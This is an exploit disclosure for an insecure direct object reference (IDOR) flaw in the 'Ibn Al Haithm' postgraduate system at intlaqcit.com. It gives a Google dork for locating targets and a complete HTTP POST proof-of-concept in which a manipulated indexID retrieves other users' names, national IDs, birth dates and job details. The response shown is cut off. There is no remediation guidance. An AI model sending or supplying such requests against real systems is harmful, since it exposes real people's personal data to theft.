#Exploit Title: Ibn Al Haithm intlaqcit.com - Multiple Vulnerabilities # Date: May 19, 2025 # Exploit Author: wa0_3 # Telegram: @wa0_3 # Vendor Homepage: intlaqcit.com # Version: 1.0 # CVE: N/A # Google Dork: intxt: Ibn Al Haithm Postgraduates Electronic System inurl:intlaqcit.com intext:"Ibn Al Haithm" =============================================================================================================================== #Description This vulnerability occurs due to lack of access control validation on the indexID parameter in the selectOnlineReadContData API endpoint. An attacker can manipulate this parameter to access sensitive data of other users, including full name, national ID, birth date, and job information — leading to a full personal data breach. =============================================================================================================================== Vulnerability: IDOR ## Proof of Concept (PoC): POST /getJCI HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFToken: null X-Requested-With: XMLHttpRequest Content-Length: 147 Connection: keep-alive Cookie: sysDate="your cookie" param0=onlineReg.onlineRegData¶m1=selectOnlineReadContData¶m2=userID¶m3=%7B%22sysLang%22%3A%22A%22%2C%22indexID%22%3A%22800024307%22%7D ============================================================================================================================================================================= ## Response: HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Connection: keep-alive Set-Cookie: (your cookie) Server: TornadoServer/4.4 Content-Length: 1075 { "rows": [{ "dataAvailable": "True", "row": { ============================================================================================================================================================================= # Credits: Discovered and reported by wa0_3 Telegram: @wa0_3